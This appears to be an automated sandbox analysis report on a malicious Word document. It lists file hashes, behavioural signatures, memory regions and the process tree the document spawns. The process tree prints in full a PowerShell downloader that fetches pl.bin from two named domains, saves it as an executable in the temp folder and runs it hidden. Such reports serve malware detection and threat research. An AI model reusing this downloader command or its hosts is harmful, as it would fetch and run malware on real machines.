Analysis

  • max time kernel
    106s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-11-2022 09:30

General

  • Target

    3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc

  • Size

    78KB

  • MD5

    8d2ff5302b1a00e27fc74a4a0e7d691e

  • SHA1

    c31d9dabf66ca0bcf3d18e530bd8c659451f6867

  • SHA256

    3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73

  • SHA512

    3021215fea7224c5fe15a7838c9353c6745bc3f0729ff8df46b77d9aa7a002214280a6056ce6bf43a0248d0bbda5a1d7a3c54e4b38ace76b52161a09ae94262f

  • SSDEEP

    1536:fvCIgb6Evkehxknn1N9AQTZZNcXlCqe8K6NV:fvCI87vhyn1NnTZZNmCqTN

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1428
      • C:\Windows\SYSTEM32\WISPTIS.EXE
        "C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of SetWindowsHookEx
        PID:1692
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell "'powershell ""function ipxxtup([string] $plqtxd){(new-object system.net.webclient).downloadfile($plqtxd,''%tmp%\eblh.exe'');start-process ''%tmp%\eblh.exe'';}try{ipxxtup(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{ipxxtup(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath %tmp%\pbvuq.bat; start-process '%tmp%\pbvuq.bat' -windowstyle hidden"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "'powershell ""function ipxxtup([string] $plqtxd){(new-object system.net.webclient).downloadfile($plqtxd,''C:\Users\Admin\AppData\Local\Temp\eblh.exe'');start-process ''C:\Users\Admin\AppData\Local\Temp\eblh.exe'';}try{ipxxtup(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{ipxxtup(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath C:\Users\Admin\AppData\Local\Temp\pbvuq.bat; start-process 'C:\Users\Admin\AppData\Local\Temp\pbvuq.bat' -windowstyle hidden"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\pbvuq.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1732
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "function ipxxtup([string] $plqtxd){(new-object system.net.webclient).downloadfile($plqtxd,'C:\Users\Admin\AppData\Local\Temp\eblh.exe');start-process 'C:\Users\Admin\AppData\Local\Temp\eblh.exe';}try{ipxxtup('http://electrofluxequipmentspvtltd.com/pl.bin')}catch{ipxxtup('http://goloramltd.com/pl.bin')}
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:940

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\pbvuq.bat
      Filesize

      317B

      MD5

      73b9c478424c2825e98bcff8696ee9ef

      SHA1

      ecad8b9b7daca75d4ec2f5ce5d3f6d8babbd2b6f

      SHA256

      e4334b39e5468f625b31cf9597e582edfcf2b2f3bfad2bd3d6a7f704aa58e42c

      SHA512

      e06e3858c900d21aa342c7dcb14ef309f4f52e0f426f2b1a17d18ca1bb1d9c74a7a2f89050f21f1c67361c02d9803a50ae939dc3a6463965cffe356f773eecc9

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      88d81a9ef723db8a4242327ac43c4170

      SHA1

      72b69602eeed31792a074c7cfea6e671cdce521f

      SHA256

      0027a7afda90232cb87195ed1301fc4d90a2d288359fb3b6d3dba3e5d3f60673

      SHA512

      7039d356ecc547212f0368a18316ec5be7fbf86e4a5e76550327b40c96044c0dc05c80d7e1354a5de11158a6849b8f717953564eb0696d2774dcf8ca554c5bf5

    • memory/940-78-0x0000000005030000-0x000000000506C000-memory.dmp
      Filesize

      240KB

    • memory/940-77-0x000000006A580000-0x000000006AB2B000-memory.dmp
      Filesize

      5.7MB

    • memory/940-80-0x0000000005100000-0x000000000510D000-memory.dmp
      Filesize

      52KB

    • memory/940-73-0x0000000000000000-mapping.dmp
    • memory/940-82-0x000000006A580000-0x000000006AB2B000-memory.dmp
      Filesize

      5.7MB

    • memory/1280-65-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

    • memory/1280-54-0x00000000724D1000-0x00000000724D4000-memory.dmp
      Filesize

      12KB

    • memory/1280-64-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

    • memory/1280-84-0x0000000070F3D000-0x0000000070F48000-memory.dmp
      Filesize

      44KB

    • memory/1280-62-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

    • memory/1280-55-0x000000006FF51000-0x000000006FF53000-memory.dmp
      Filesize

      8KB

    • memory/1280-83-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1280-63-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

    • memory/1280-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1280-81-0x0000000070F3D000-0x0000000070F48000-memory.dmp
      Filesize

      44KB

    • memory/1280-57-0x0000000075601000-0x0000000075603000-memory.dmp
      Filesize

      8KB

    • memory/1280-58-0x0000000070F3D000-0x0000000070F48000-memory.dmp
      Filesize

      44KB

    • memory/1300-66-0x0000000000000000-mapping.dmp
    • memory/1428-59-0x0000000000000000-mapping.dmp
    • memory/1428-60-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp
      Filesize

      8KB

    • memory/1500-69-0x000000006A830000-0x000000006ADDB000-memory.dmp
      Filesize

      5.7MB

    • memory/1500-74-0x000000006A830000-0x000000006ADDB000-memory.dmp
      Filesize

      5.7MB

    • memory/1500-70-0x0000000004B20000-0x0000000005056000-memory.dmp
      Filesize

      5.2MB

    • memory/1500-67-0x0000000000000000-mapping.dmp
    • memory/1692-61-0x0000000000000000-mapping.dmp
    • memory/1732-71-0x0000000000000000-mapping.dmp